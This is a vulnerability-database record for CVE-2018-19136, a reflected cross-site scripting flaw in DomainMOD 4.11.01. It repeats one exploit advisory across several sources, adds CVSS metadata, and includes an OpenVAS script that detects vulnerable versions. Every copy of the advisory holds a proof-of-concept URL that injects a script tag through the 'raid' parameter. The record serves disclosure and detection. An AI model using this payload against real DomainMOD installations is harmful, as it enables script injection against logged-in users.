ID PACKETSTORM:150386
Type packetstorm
Reporter Dawood Ansar
Modified 2018-11-16T00:00:00
Description
`# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-09
# Exploit Author: Dawood Ansar
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19136
# A reflected cross-site scripting (XSS) vulnerability was discovered in the DomainMOD application,
# versions v4.09.03 to v4.11.01 (https://github.com/domainmod/domainmod/issues/79).
# After logging into the DomainMOD application panel, browse to the assets/edit/registrar-account.php
# page and inject a JavaScript XSS payload in the raid parameter.
# POC:
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1
`
{"id": "PACKETSTORM:150386", "type": "packetstorm", "bulletinFamily": "exploit", "title": "DomainMOD 4.11.01 Cross Site Scripting", "description": "", "published": "2018-11-16T00:00:00", "modified": "2018-11-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150386/DomainMOD-4.11.01-Cross-Site-Scripting.html", "reporter": "Dawood Ansar", "references": [], "cvelist": ["CVE-2018-19136"], "lastseen": "2018-11-17T02:20:04", "viewCount": 282, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-19136"]}, {"type": "exploitdb", "idList": ["EDB-ID:45883"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:98B3D12CA3D35A610327A45E55849405"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113327"]}, {"type": "zdt", "idList": ["1337DAY-ID-31647"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-19136"]}, {"type": "exploitdb", "idList": ["EDB-ID:45883"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:98B3D12CA3D35A610327A45E55849405"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113327"]}, {"type": "zdt", "idList": ["1337DAY-ID-31647"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceHref": "https://packetstormsecurity.com/files/download/150386/domainmod41101-xss.txt", "sourceData": "`# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting \n# Date: 2018-11-09 \n# Exploit Author: Dawood Ansar \n# Vendor Homepage: domainmod (https://domainmod.org/) \n# Software Link: domainmod (https://github.com/domainmod/domainmod) \n# Version: v4.09.03 to v4.11.01 \n# CVE : CVE-2018-19136 \n \n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \n# versions from v4.09.03 to v4.11.01i1/4https://github.com/domainmod/domainmod/issues/79i1/4 \n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \n# page and inject a javascript XSS 
payload in raid parameter \n \n# POC: \nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1 \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645388527}}
{"zdt": [{"lastseen": "2018-11-19T19:12:48", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-11-16T00:00:00", "type": "zdt", "title": "DomainMOD 4.11.01 - Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-19136"], "modified": "2018-11-16T00:00:00", "id": "1337DAY-ID-31647", "href": "https://0day.today/exploit/description/31647", "sourceData": "# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting\r\n# Exploit Author: Dawood Ansar\r\n# Vendor Homepage: domainmod (https://domainmod.org/)\r\n# Software Link: domainmod (https://github.com/domainmod/domainmod)\r\n# Version: v4.09.03 to v4.11.01\r\n# CVE : CVE-2018-19136\r\n \r\n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \r\n# versions from v4.09.03 to v4.11.01\uff08https://github.com/domainmod/domainmod/issues/79\uff09\r\n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \r\n# page and inject a javascript XSS payload in raid parameter\r\n \r\n# POC: \r\nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1\n\n# 0day.today [2018-11-19] #", "sourceHref": "https://0day.today/exploit/31647", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:12", "description": "\nDomainMOD 4.11.01 - raid Cross-Site Scripting", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-11-16T00:00:00", "title": "DomainMOD 4.11.01 - raid Cross-Site Scripting", 
"type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19136"], "modified": "2018-11-16T00:00:00", "id": "EXPLOITPACK:98B3D12CA3D35A610327A45E55849405", "href": "", "sourceData": "# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting\n# Date: 2018-11-09\n# Exploit Author: Dawood Ansar\n# Vendor Homepage: domainmod (https://domainmod.org/)\n# Software Link: domainmod (https://github.com/domainmod/domainmod)\n# Version: v4.09.03 to v4.11.01\n# CVE : CVE-2018-19136\n\n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \n# versions from v4.09.03 to v4.11.01\uff08https://github.com/domainmod/domainmod/issues/79\uff09\n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \n# page and inject a javascript XSS payload in raid parameter\n\n# POC: \nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T15:12:39", "description": "DomainMOD through 4.11.01 has XSS via the assets/edit/registrar-account.php raid parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-11-09T19:29:00", "type": "cve", "title": "CVE-2018-19136", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19136"], "modified": "2018-12-11T19:52:00", "cpe": ["cpe:/a:domainmod:domainmod:4.11.01"], "id": "CVE-2018-19136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19136", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:domainmod:domainmod:4.11.01:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:34:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-11-16T00:00:00", "type": "exploitdb", "title": "DomainMOD 4.11.01 - 'raid' Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": 
"PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19136", "2018-19136"], "modified": "2018-11-16T00:00:00", "id": "EDB-ID:45883", "href": "https://www.exploit-db.com/exploits/45883", "sourceData": "# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting\r\n# Date: 2018-11-09\r\n# Exploit Author: Dawood Ansar\r\n# Vendor Homepage: domainmod (https://domainmod.org/)\r\n# Software Link: domainmod (https://github.com/domainmod/domainmod)\r\n# Version: v4.09.03 to v4.11.01\r\n# CVE : CVE-2018-19136\r\n\r\n# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application \r\n# versions from v4.09.03 to v4.11.01\uff08https://github.com/domainmod/domainmod/issues/79\uff09\r\n# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php \r\n# page and inject a javascript XSS payload in raid parameter\r\n\r\n# POC: \r\nhttp://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(\"XSS\")%3C%2Fscript%3E&del=1", "sourceHref": "https://www.exploit-db.com/download/45883", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-10-09T14:28:47", "description": "DomainMOD is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-01-22T00:00:00", "type": "openvas", "title": "DomainMOD < 4.12.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-19749", "CVE-2018-19913", "CVE-2018-20010", "CVE-2018-19752", "CVE-2018-19136", "CVE-2018-19914", "CVE-2018-20011", "CVE-2018-19750", "CVE-2019-1010096", "CVE-2018-19892", "CVE-2018-19137", "CVE-2018-20009", "CVE-2018-11558", "CVE-2018-19751", "CVE-2019-1010095", "CVE-2018-19915", "CVE-2019-1010094", "CVE-2018-11559"], "modified": "2019-10-07T00:00:00", "id": 
"OPENVAS:1361412562310113327", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113327", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113327\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-22 15:55:07 +0200 (Tue, 22 Jan 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-11558\", \"CVE-2018-11559\", \"CVE-2018-19136\", \"CVE-2018-19137\", \"CVE-2018-19749\", \"CVE-2018-19750\",\n \"CVE-2018-19751\", \"CVE-2018-19752\", \"CVE-2018-19892\", \"CVE-2018-19913\", \"CVE-2018-19914\",\n \"CVE-2018-19915\", \"CVE-2018-20009\", \"CVE-2018-20010\", \"CVE-2018-20011\", \"CVE-2019-1010094\",\n \"CVE-2019-1010095\", 
\"CVE-2019-1010096\");\n\n script_name(\"DomainMOD < 4.12.0 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_domainmod_http_detect.nasl\");\n script_mandatory_keys(\"domainmod/detected\");\n\n script_tag(name:\"summary\", value:\"DomainMOD is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Stored XSS in the '/settings/profile/index.php' new_first_name parameter\n\n - Stored XSS in the '/settings/profile/index.php' new_last_name parameter\n\n - XSS via the admin/dw/add-server.php DisplayName, HostName, or UserName field\n\n - XSS via the assets/add/account-owner.php Owner name field\n\n - XSS via the admin/domain-fields/ notes field in an Add Custom Field action for Custom Domain Fields\n\n - XSS via the admin/ssl-fields/add.php notes field for Custom SSL Fields\n\n - XSS via the assets/add/registrar.php notes field for the Registrar\n\n - XSS via the assets/edit/registrar-account.php raid parameter\n\n - XSS via the assets/edit/ip-address.php ipid parameter\n\n - XSS via the assets/add/ssl-provider.php SSL Provider Name or SSL Provider URL field\n\n - XSS via the assets/add/ssl-provider-account.php username field\n\n - XSS via the assets/add/registrar-accounts.php UserName, Reseller ID, or notes field\n\n - XSS via the assets/add/dns.php Profile Name or notes field\n\n - XSS via the assets/edit/host.php Web Host Name or Web Host URL field\n\n - CSRF in /settings/password that allows an attacker to change the admin password\n\n - CSRF in /admin/users/add.php allows an attacker to add an administrator account\n\n - CSRF in /admin/users/edit.php?uid=2 allows an attacker to change the read-only user to admin\");\n 
script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to craft a malicious\n link containing arbitrary JavaScript or HTML or perform actions in the context of another user.\");\n script_tag(name:\"affected\", value:\"DomainMOD prior to version 4.12.0.\");\n script_tag(name:\"solution\", value:\"Update to DomainMOD version 4.12.0 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/65\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/66\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/79\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/81\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/82\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/83\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/84\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/86\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/87\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/88\");\n script_xref(name:\"URL\", value:\"https://github.com/domainmod/domainmod/issues/79#issuecomment-460035220\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:domainmod:domainmod\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"4.12.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"4.12.0\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}